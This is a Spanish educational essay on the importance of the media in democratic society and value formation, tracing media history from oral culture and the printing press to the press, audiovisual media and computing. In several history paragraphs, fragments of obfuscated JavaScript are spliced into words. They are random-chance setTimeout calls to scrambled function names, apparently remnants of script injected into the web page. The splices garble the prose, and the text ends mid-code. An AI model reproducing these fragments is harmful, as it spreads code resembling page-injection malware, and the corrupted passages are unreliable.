LA IMPORTANCIA DE LOS MEDIOS DE COMUNICACIÓN EN LA SOCIEDAD DEMOCRÁTICA Y EN LA FORMACIÓN DE VALORES. ACTITUDES Y HÁBITOS DE CONVIVENCIA

Autora: Milagros García Habernau

          Los medios de comunicación son simples mediadores entre la realidad y los receptores (lectores, radioyentes, televidentes…). El recorrido de la información podíamos sintetizarlo en tres momentos:


1-     Se elabora en las agencias informativas.

2-     Se recibe en los medios informativos, y una vez seleccionada, organizada y reelaborada

3-     Se difunde a la población.

          Es evidente que el papel de la población es clara y rotundamente pasivo; lo único que hace es recepcionar los mensajes.

          La información recibida no es la realidad en su forma objetiva, por dos razones:

-          Porque no es la realidad en sí misma, sino una reconstrucción de la misma, realizada por seres que tienen unos conocimientos, unas actitudes y unos valores que de manera inevitable sesgan la información tratada.


-          Porque los receptores no reciben esa información de manera aséptica, sino contaminada por la forma particular de percibir que cada uno tiene.


          Todo ello hace que necesariamente el análisis de este sesgo sea un objetivo básico de la educación. La importancia de los medios de comunicación en la sociedad democrática viene dada por dos de las funciones antes mencionadas: informar y formar.


          Efectivamente, la participación de los ciudadanos en los asuntos públicos requiere formación e información, que implica el conocimiento de las decisiones que se toman en la sociedad a la que pertenecen y la valoración crítica de las mismas, formándose una opinión acerca de ellas. Los medios de comunicación, bien entendidos, pueden contribuir a la profundización en la democracia.

          Los medios de comunicación se han convertido así en el cuarto poder en los sistemas democráticos, al someter a la luz pública las decisiones que se adoptan en los poderes oficiales. Claro que, como ya hemos señalado, sería ingenuo pensar que los medios de comunicación son neutrales y que sirven solo al interés general. Como bien sabemos, todos los medios sirven a grupos de poder, económicos, religiosos o de cualquier otro tipo.


           No obstante, de esta afirmación surge una primera consideración educativa de especial interés: la toma de conciencia de la mediatización de la realidad que ofrecen los medios, y de los intereses a los que sirven, hace necesario educar para su uso crítico.


           La evolución histórica de los medios de comunicación viene determinada por la evolución tecnológica, pudiendo distinguirse las siguientes fases:


1-     Hasta la aparición de la imprenta. La comunicación ha estado enormemente limitada a la comunicación oral y los copistas, por lo que la información era privilegio de unos pocos (prehistoria de los medios de comunicación).


2-     La imprenta. Cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando Gutemberg imprimió por primera vez sobre el soporte del papel se produjo un hecho histórico trascendental para la difusión de la cultura a todos los sectores de la sociedad. La aparición de la imprenta fue una auténtica revolución técnica que consagró al libro como instrumento de experiencia y difusión de la cultura.


3-     La prensa escrita, que se plantea en los primeros momentos los objetivos de informar y culturizar. En un principio sin distinción de clases, ha ido evolucionandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando hasta llegar a la actualidad, en que las grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andes multinacionales de la información dominan abiertamente un sector económico de fuerte proyección política (de ahí que se le llame el 4º poder).


4-     Los medios audiovisuales. En principio nacen con el fin de servir como un medio de entretenimiento familiar. El cine aprovechó las innovaciones de otros campos (fotografía fija y en movimiento) para ofrecer de otro modo los espectáculos. La radio y la televisión surgen a partir de otras innovaciones tecnológicas como el teléfono, telégrafo… La radio que en principio fue básicamente tecnología se nutrió de contenido y pasó a ser un medio de comunicación muy popular. La televisión, que surge para entretener, rápidamente se hace con un papel muy importante dentro de los medios de comunicación. Su evolución ha hecho que haya ido asumiendo actividades y fórmulas de todos los demás medios (cine, radio, prensa…) pasandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando a ser como un medio donde la audiencia podía entretenerse, informarse… desde su casa.


5-     La informática. Ha ido evolucionandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}